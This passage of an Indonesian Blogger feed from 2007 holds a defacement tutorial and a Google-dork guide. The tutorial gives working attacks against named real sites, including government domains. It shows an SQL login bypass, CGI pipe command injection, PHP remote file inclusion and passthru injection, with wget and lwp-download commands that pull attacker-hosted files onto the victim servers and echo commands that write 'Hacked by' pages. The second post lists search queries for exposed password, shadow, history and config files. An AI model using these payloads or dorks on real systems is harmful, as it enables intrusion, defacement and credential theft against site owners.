style="font-family:Courier New;"&gt;Catatan :&lt;br /&gt;Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai&lt;br /&gt;keinginan lu.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.&lt;br /&gt;Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php&lt;br /&gt;Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.&lt;br /&gt;Nah…muncul deh hasil deface kita di guestbook tsb.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;======================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface asp dgn sql injection&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;1. buka browsing/url www.google.co.id&lt;br /&gt;2. ketik site:go.id login.asp&lt;br /&gt;misal nya kita dapat target www.namatarget.com/login.asp&lt;br /&gt;3. username dan pass ketik ‘or”=’&lt;br /&gt;4. buka satu persatu file yg ada disana&lt;br /&gt;5. cari file yg bisa kita ubah/deface&lt;br /&gt;6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com&lt;br /&gt;7. kalo hasil nya belum ada, klik tab refresh disamping url lu&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;======================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface cgi&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html &lt;&lt;&lt; file aslinya&lt;br /&gt;tambahin |pwd| diujungnya&lt;br /&gt;|pwd| &lt;&lt;&lt; perintah/bug utk linux/unix&lt;br /&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|&lt;br /&gt;yg keluar di web target adalah /home/sites/site52/users/wolfsecu/web/coartcds/Web_store&lt;br /&gt;ok......lanjut&lt;br /&gt;https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|&lt;br /&gt;kasih jarak 1 spasi wget dgn situs lu&lt;br /&gt;-O  &lt;&lt; ini huruf -O besar, bukan angka nol&lt;br /&gt;cara liat nya =&gt; https://bronte.netpresence.com.au/~wolfsecu/arai.html&lt;br /&gt;…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store  &lt;&lt;&lt; perhatikan baik2&lt;br /&gt;.../home/sites/site52/users/wolfsecu/web/jh.htm &lt;&lt;&lt; perhatikan baik2&lt;br /&gt;.../coartcds/Web_store &lt;&lt;&lt; musti dibuang&lt;br /&gt;cara cari target =&gt; allinurl&lt;img src="http://arai.web.id/v1.2/smilies/yahoo_kiss.gif" alt=":*" class="wp-smiley" title=":*" height="18" width="18" /&gt;.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl&lt;img src="http://arai.web.id/v1.2/smilies/yahoo_kiss.gif" alt=":*" class="wp-smiley" title=":*" height="18" width="18" /&gt;.cgi%3Fpage%3D*.html+site:.com&amp;amp;hl=id&amp;amp;lr=&amp;amp;start=10&amp;amp;sa=N&lt;br /&gt;target nya musti file html diujung nya kalo mau tambahin |pwd|&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;=======================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface cgi II&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” &gt; /usr/home/web/users/a0004481/html/adspro/jh.html|&lt;br /&gt;http://www.sports-media.org/adspro/jh.html&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm &lt;&lt; file asli&lt;br /&gt;|id| &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; utk meliat user yg ada diserver tsb&lt;br /&gt;|pwd| &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; utk meliat file yg ada diserver tsb&lt;br /&gt;http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| &gt;&gt;&gt;&gt;&gt;&gt;&gt; usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro&lt;br /&gt;usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; perhatikan baik2&lt;br /&gt;usr/home/web/users/a0004481/html/adspro/jh.html &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; perhatikan baik2&lt;br /&gt;cgi-bin/adspro &lt;&lt;&lt;&lt;&lt;&lt;&lt; dibuang&lt;br /&gt;liat file index.html =&gt; http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|&lt;br /&gt;http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”&gt;decae.html|&amp;amp;cart_id=9721374.5730&lt;br /&gt;http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/4.bmp" /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;======================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface php dgn injection&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://dillon2.edumail.us/index.php?name=PNphpBB2&amp;amp;file=index&amp;amp;c=4&lt;br /&gt;itu file aslinya&lt;br /&gt;modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;itu bug nya&lt;br /&gt;http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;jadi index.php?name=PNphpBB2&amp;amp;file=index&amp;amp;c=4 dibuang&lt;br /&gt;cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;dikotak command unix masukin&lt;br /&gt;wget http://geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.narnia-chroniken.de &lt;&lt;&lt; halaman depan di deface&lt;br /&gt;http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;ketik : pwd&lt;br /&gt;cd /homepages/7/d117874362/htdocs;wget file deface&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;========================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface php dgn injection II&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php&lt;br /&gt;itu file aslinya&lt;br /&gt;http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;dikotak masukin: pwd&lt;br /&gt;jadi pics%2Fom%2Findex.php dibuang&lt;br /&gt;cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?&lt;br /&gt;dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html&lt;br /&gt;cara liat nya http://www.giphted.com/arai.html&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;=========================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface phpbb/forum&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.bpmpt.go.id/forum/index.php&lt;br /&gt;itu file aslinya&lt;br /&gt;includes/db.php?phpbb_root_path=&lt;br /&gt;itu bug nya&lt;br /&gt;jadi index.php dibuang&lt;br /&gt;http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?&lt;br /&gt;dikotak masukin: pwd&lt;br /&gt;Kalo keluar “Hacking attempt” artinya dipath&lt;br /&gt;Tapi kalo berhasil, terserah lu mau di apain……&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;==========================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface phpbb/forum II&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&lt;br /&gt;itu file aslinya&lt;br /&gt;&amp;amp;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;amp;a=id;pwd&lt;br /&gt;itu bug nya&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&amp;amp;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;amp;a=id;pwd&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;cara wget nya ada 3 cara :&lt;br /&gt;1.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;amp;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;amp;a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls&lt;br /&gt;2.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;amp;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;amp;a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm&lt;br /&gt;3.http://singapore.bluejackings.net/viewtopic.php?t=51&amp;amp;highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&amp;amp;a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls&lt;br /&gt;biasa nya cara ke 3 yg berhasil.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;cara liat nya http://singapore.bluejackings.net/arai.html&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;=========================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;cara liat fs tanpa login&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.friendster.com/useropen.php?uid=&lt;br /&gt;&lt;&lt;&lt;&lt;&lt;&lt;&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;===========================================&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;deface php dgn injection III&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;langsung di tembak aja bos biar ga lama2&lt;br /&gt;www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?&lt;br /&gt;kolo berhasil seperti biasa&lt;br /&gt;cmd sql php injection&lt;br /&gt;buat nyari akses ke foldernya&lt;br /&gt;cmd =&gt; find / -perm 777 -type d&lt;br /&gt;klo foldernya permision denied berarti kita ga bisa apa2 di folder itu&lt;br /&gt;cari folder yg ga ada tulisan perm&lt;br /&gt;ambil contoh ini&lt;br /&gt;http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?&lt;br /&gt;cari akses foldernya [commndnya diatas]&lt;br /&gt;cmd =&gt; find / -perm 777 -type d&lt;br /&gt;bakal makan B/w&lt;br /&gt;jd sabar aja&lt;br /&gt;=== contoh -perm denied ==&lt;br /&gt;find: /mnt/drive2/lost+found: Permission denied&lt;br /&gt;find: /proc/tty/driver: Permission denied&lt;br /&gt;find: /proc/1/task/1/fd: Permission denied&lt;br /&gt;itu artinya no akses&lt;br /&gt;kita cari yg lain&lt;br /&gt;tp usahakan foldernya yg /var/www/&lt;br /&gt;klo ga ada juga gpp&lt;br /&gt;ada yg lain&lt;br /&gt;/home/httpd/vhosts/hdca.org/httpdocs/downloads =&gt; contoh folder yg bisa&lt;br /&gt;cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]&lt;br /&gt;[command dasar OSnya] =&gt; wget, dir, cat, rm, rv -rf dll&lt;br /&gt;skarang kita wget&lt;br /&gt;cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;coba lo masukin&lt;br /&gt;ke cmdnya&lt;br /&gt;———————————————————&lt;br /&gt;–10:35:01–  http://www.geocities.com/nusantarajaya_2004/arai.html&lt;br /&gt;=&gt; `arai.html’&lt;br /&gt;Resolving www.geocities.com… 66.218.77.68&lt;br /&gt;Connecting to www.geocities.com[66.218.77.68]:80… connected.&lt;br /&gt;HTTP request sent, awaiting response… 200 OK&lt;br /&gt;Length: 6,021 [text/html]&lt;br /&gt;0K …..                                                 100%   98.21 KB/s&lt;br /&gt;10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]&lt;br /&gt;———————————————————&lt;br /&gt;itu artinya sukses ke save&lt;br /&gt;karena httpdocs&lt;br /&gt;gampang cara liatnya&lt;br /&gt;/home/httpd/vhosts/hdca.org/httpdocs/downloads =&gt; www.hdca.org/downloads/[file deface lo]&lt;br /&gt;contoh www.hdca.org/downloads/arai.html&lt;br /&gt;selsai deh&lt;br /&gt;gampang kan&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/&lt;br /&gt;http://www.blogbugs.com/index.php?mod=articledetail&amp;amp;&amp;amp;aid=Nzk=&lt;br /&gt;http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&amp;amp;cmd=id;pwd&lt;br /&gt;http://img143.imageshack.us/img143/6782/hacked8lc.jpg&lt;br /&gt;http://www.sobatpadi.net/download/&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&amp;amp;dir=http://www.geocities.com/dian_maulani2005/inject.htm?&amp;amp;cmd=id;pwd;ks%20-la&lt;br /&gt;http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani &lt;/span&gt;&lt;/p&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-8234544089896840710?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8234544089896840710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8234544089896840710'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/langkah-langkah-deface.html' title='Langkah-Langkah Deface'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2255862731443524123</id><published>2007-09-16T08:25:00.000+07:00</published><updated>2007-09-16T08:27:45.198+07:00</updated><title type='text'>Trik Menggunakan Mesin Pencari Google</title><content type='html'>&lt;a tip="" href="http://www.loker.web.id/" target="_blank"&gt; &lt;img src="http://www.loker.web.id/images/loker_banner.jpg" alt="Inforrmasi Lowongan Kerja &amp;amp; Karir" border="0" /&gt;&lt;/a&gt;           &lt;h3 class="entrytitle" id="post-31"&gt;  &lt;a tip="" href="http://www.titik.org/2006/05/09/trik-menggunakan-mesin-pencari-google.html" rel="bookmark"&gt;&lt;/a&gt;&lt;/h3&gt;                     &lt;p&gt;Pada kesempatan ini akan dipaparkan penggunaan mesin pencari informasi Google, untuk mendapatkan informasi yang tersembunyi dan sangat penting. Dimana informasi tersebut tidak terlihat melalui metode pencarian biasa. Artikel ini berdasarkan pada FAQ dan diskusi pada milis situs keamanan jaringan komputer http://bugtraq.org dan http://insecure.org tentang metode pengumpulan informasi berkaitan dengan aktifitas webhacking .&lt;/p&gt;  &lt;p&gt;Kecenderungan penggunaan teknik ini pada awalnya digunakan untuk mendapatkan informasi sebanyak banyaknya kepada target mesin ataupun mendapatkan hak akses yang tidak wajar. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, semoga saja paparan ini digunakan untuk tujuan mencari informasi dengan tujuan yang tidak destruktif, tetapi ialah untuk membantu pencarian informasi yang tepat, cepat dan akurat untuk tujuan yang baik dan bermanfaat.&lt;br /&gt;Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;” Intitle:”&lt;/strong&gt; ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang&lt;br /&gt;dimaksud. Sebagai contoh pada pencarian, “intitle:&lt;br /&gt;password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .&lt;br /&gt;Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“ inurl:”&lt;/strong&gt; ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.&lt;br /&gt;Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.&lt;br /&gt;Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“site:”&lt;/strong&gt; ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“cache:”&lt;/strong&gt; akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:&lt;br /&gt;“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“filetype:”&lt;/strong&gt; ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“link:”&lt;/strong&gt; ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“related:”&lt;/strong&gt; sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.&lt;br /&gt;Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;“intext:”&lt;/strong&gt; sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :&lt;br /&gt;“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.&lt;/p&gt; &lt;p&gt;Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.&lt;br /&gt;Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .&lt;/p&gt; &lt;p&gt;Sintaks &lt;strong&gt;“Index of ”&lt;/strong&gt; dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.&lt;br /&gt;Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.&lt;br /&gt;Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.&lt;br /&gt;Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.&lt;/p&gt; &lt;p&gt;Contoh :&lt;br /&gt;Index of /admin&lt;br /&gt;Index of /passwd&lt;br /&gt;Index of /password&lt;br /&gt;Index of /mail&lt;br /&gt;“Index of /” +passwd&lt;br /&gt;“Index of /” +password.txt&lt;br /&gt;“Index of /” +.htaccess&lt;br /&gt;“Index of /secret”&lt;br /&gt;“Index of /confidential”&lt;br /&gt;“Index of /root”&lt;br /&gt;“Index of /cgi-bin”&lt;br /&gt;“Index of /credit-card”&lt;br /&gt;“Index of /logs”&lt;br /&gt;“Index of /config”&lt;br /&gt;“Index of/admin.asp&lt;br /&gt;“Index of/login.asp&lt;/p&gt; &lt;p&gt;Mencari sistem atau server yang vulnerable menggunakan sintaks&lt;strong&gt; “inurl:”&lt;/strong&gt; atau &lt;strong&gt;“allinurl:”&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32”. Terkadang akan didapat akses pada cmd.exe pada direktori “system32” yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.&lt;/p&gt; &lt;p&gt;2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com&lt;/p&gt; &lt;p&gt;3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.&lt;/p&gt; &lt;p&gt;4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.&lt;/p&gt; &lt;p&gt;Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :&lt;/p&gt; &lt;p&gt;Inurl: /cgi-bin/cart32.exe&lt;br /&gt;inurl:admin filetype:txt&lt;br /&gt;inurl:admin filetype:db&lt;br /&gt;inurl:admin filetype:cfg&lt;br /&gt;inurl:mysql filetype:cfg&lt;br /&gt;inurl:passwd filetype:txt&lt;br /&gt;inurl:iisadmin&lt;br /&gt;inurl:auth_user_file.txt&lt;br /&gt;inurl:orders.txt&lt;br /&gt;inurl:”wwwroot/*.”&lt;br /&gt;inurl:adpassword.txt&lt;br /&gt;inurl:webeditor.php&lt;br /&gt;inurl:file_upload.php&lt;br /&gt;inurl:gov filetype:xls “restricted”&lt;br /&gt;index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php&lt;br /&gt;allinurl:/phpinfo.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;inurl:cgi-bin/go.cgi?go=*&lt;br /&gt;allinurl:.cgi?page=*.txt&lt;br /&gt;allinurul:/modules/My_eGallery&lt;/p&gt; &lt;p&gt;Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks &lt;strong&gt;“intitle:”&lt;/strong&gt;&lt;br /&gt;atau &lt;strong&gt;“allintitle:”&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;1. Menggunakan allintitle: “index of /root” ( tanpa tanda kutip ) akan menampilkan&lt;br /&gt;Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.&lt;/p&gt; &lt;p&gt;2. Menggunakan allintitle: “index of /admin” ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori “admin”.&lt;/p&gt; &lt;p&gt;Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :&lt;/p&gt; &lt;p&gt;intitle:”Index of” .sh_history&lt;br /&gt;intitle:”Index of” .bash_history&lt;br /&gt;intitle:”index of” passwd&lt;br /&gt;intitle:”index of” people.lst&lt;br /&gt;intitle:”index of” pwd.db&lt;br /&gt;intitle:”index of” etc/shadow&lt;br /&gt;intitle:”index of” spwd&lt;br /&gt;intitle:”index of” master.passwd&lt;br /&gt;intitle:”index of” htpasswd&lt;br /&gt;intitle:”index of” members OR accounts&lt;br /&gt;intitle:”index of” user_carts OR user_cart&lt;br /&gt;allintitle: sensitive filetype:doc&lt;br /&gt;allintitle: restricted filetype :mail&lt;br /&gt;allintitle: restricted filetype:doc site:gov&lt;br /&gt;allintitle:*.php?filename=*&lt;br /&gt;allintitle:*.php?page=*&lt;br /&gt;allintitle:*.php?logon=*&lt;/p&gt; &lt;p&gt;Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.&lt;br /&gt;Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.&lt;br /&gt;Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah lama “ resiko ditanggung penumpang “.&lt;/p&gt; &lt;p&gt;Sumber : &lt;a tip="Demystifying Google Hacks" href="http://www.hackingspirits.com/eth-hac/papers/whitepapers.asp" target="_blank"&gt;Demystifying Google Hacks&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2255862731443524123?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' 